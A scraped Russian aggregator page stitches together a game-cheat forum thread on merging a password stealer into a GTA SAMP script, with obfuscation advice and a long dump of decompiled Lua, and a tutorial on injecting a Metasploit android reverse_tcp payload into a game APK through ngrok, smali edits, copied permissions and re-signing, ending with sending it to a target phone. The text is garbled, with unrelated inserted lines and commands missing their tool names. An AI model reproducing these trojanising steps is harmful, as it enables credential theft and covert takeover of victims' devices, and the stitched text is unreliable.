Как засунуть стиллер в программу

KingBrawlStars

Участник

Автор темы
Как склеить стиллер и скрипт рабочий?

FogRider

Активный

Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?

KingBrawlStars

Участник

Автор темы

Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?

что значит «Обфусцируешь»? Кстати вставил и всё равно не робит (

FogRider

Активный

что значит «Обфусцируешь»? Кстати вставил и всё равно не робит (

Обфуска́ция или запутывание кода — приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции.

Конечно, нужно не втупую копировать и вставлять, а более грамотно «вплетать» код в код. Например, у тебя не может быть две функции main или проверки на загрузку сампа.

СОЗДАЛ СВОЙ СТИЛЛЕР И РАСПИАРИЛ ЕГО! СКОЛЬКО АККАУНТОВ ПОПАЛОСЬ? — GTA SAMP

chapo

В армии с 03.07.2023, в лс не отвечаю

Друг

Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?

Был вроде сайт который склеивает, не?

FogRider

Активный

Был вроде сайт который склеивает, не?

Нашел на просторах интернета https://luajit.ru/joiner, но сам никогда не пользовался, думаю, ручками будет надежнее.

KingBrawlStars

Участник

Автор темы
Был вроде сайт который склеивает, не?
ошибку даёт
Был вроде сайт который склеивает, не?

пж можешь склеить их и объяснить как это, что бы потом я уже сам это делал P.S 6560 это стил teleport это рил телепорт (кордмастер)

Вложения

teleport-decompiled.lua
41.4 KB · Просмотры: 2
6560 (1).luac
30.3 KB · Просмотры: 2
Последнее редактирование: 29 Июл 2021

FogRider

Активный

пж можешь склеить их и объяснить как это, что бы потом я уже сам это делал P.S 6560 это стил teleport это рил телепорт (кордмастер)

Ты пытаешься склеить скомпилированный и декомпилированный (и, в данном случае, нерабочий) скрипт, из-за этого и появляется ошибка.
Попробуй загрузить на указанный сайт обе .luac версии или прикрепи сюда два опенсурсных .lua файла.

KingBrawlStars

Участник

Автор темы

Ты пытаешься склеить скомпилированный и декомпилированный (и, в данном случае, нерабочий) скрипт, из-за этого и появляется ошибка.
Попробуй загрузить на указанный сайт обе .luac версии или прикрепи сюда два опенсурсных .lua файла.

Читайте также:
Какое расширение имеют файлы программы Microsoft word выберите один ответ

та я проверял и так и так все равно ничего не работает scum
в игре я кстати запускал стилер и тп деккомп всё робит.

chapo

В армии с 03.07.2023, в лс не отвечаю

Друг
в игре я кстати запускал стилер и тп деккомп всё робит.
как это может работать?

var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.77 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SliderGrabActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Button] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.82 —var_13_7 NUMBER-NUMBER var_13_8 = 0.39 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ButtonHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.87 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ButtonActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Header] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.76 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 0.57 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.HeaderHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.88 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 0.89 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.HeaderActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.4 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Separator] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.6 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SeparatorHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.8 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SeparatorActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGrip] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.76 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGripHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.86 —var_13_7 NUMBER-NUMBER var_13_8 = 0.41 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGripActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.82 —var_13_7 NUMBER-NUMBER var_13_8 = 0.39 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButton] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.88 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButtonHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 0.48 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButtonActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotLines] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.74 —var_13_7 NUMBER-NUMBER var_13_8 = 0.36 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotLinesHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotHistogram] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.8 —var_13_7 NUMBER-NUMBER var_13_8 = 0.38 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotHistogramHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 0.72 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.TextSelectedBg] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0.17 —var_13_6 NUMBER-NUMBER var_13_7 = 0.17 —var_13_7 NUMBER-NUMBER var_13_8 = 0.17 —var_13_8 NUMBER-NUMBER var_13_9 = 0.48 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ModalWindowDarkening] = var_13_5

Читайте также:
Задачи 1 класса программы

Источник: www.blast.hk

КАК СДЕЛАТЬ СОБСТВЕННЫЙ СТИЛЛЕР? | СТИЛЛЕР СВОИМИ РУКАМИ

Создаём стиллер на Android

Всем хай , сегодня будем вшивать Стиллер в игру , в обычный файл типа Apk , который после открытия на атакуемом смартфоне предоставит нам его сессию.
-Стиллер — определенный класс троянов (малвари, вирусов — как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их «автору».

Установка необходимых компонентов

Устанавливаем Kali Linux (https://www.kali.org/downloads/).

Далее установим Zipalign

apt-get install -y zipalign

Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл (https://gist.github.com/bmaupin/48140926ce11fbeddec2). Также понадобятся предустановленные ngrok и Metasploit.

Сборка бекдора

Запускаем в отдельном окне ngrok

Полученные lhost и lport используем для создания пейлоада

-p android/meterpreter/reverse_tcp LHOST= LPORT=M> /home/kali/payload.apk

На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью команд:

apktool d payload.apk

Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку «virtual methods» и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем

, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.

Компилируем отредактированный файл игры в apk

Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись командой

-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000

Получаем файл key.keystore. Теперь сертифицируем наш apk

-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered

Выравниваем подписанное приложение командой

-v 4 game.apk game_good.apk

Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.

Читайте также:
При работе с программой в режиме 1с предприятие предопределенные элементы справочника можно

Спасибо за внимание, дорогие участники Akatsuki , увидимся в следующей статье)!

Источник: telegra.ph

Как засунуть стиллер в программу

Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нем неправильно.
Необходимо обновить браузер или попробовать использовать другой.

B правой части каждого сообщения есть стрелки ⇧ и ⇩ . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок ✔ в правой части сообщения.

☀️ Специальное летнее предложение «Основы Python» + «Python Ethical Hacking» всего за 44.990р Не упусти возможность получить двойную выгоду: приобрети пакет курсов «Основы Python» + «Python для пентестера» со скидкой 20% только до 13 июля. Обучающая программа гарантирует комфортную нагрузку и получение необходимого объёма знаний. Ты пройдёшь путь от новичка до специалиста всего за 5 месяцев! Запишись со скидкой у менеджера

Источник: codeby.net

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru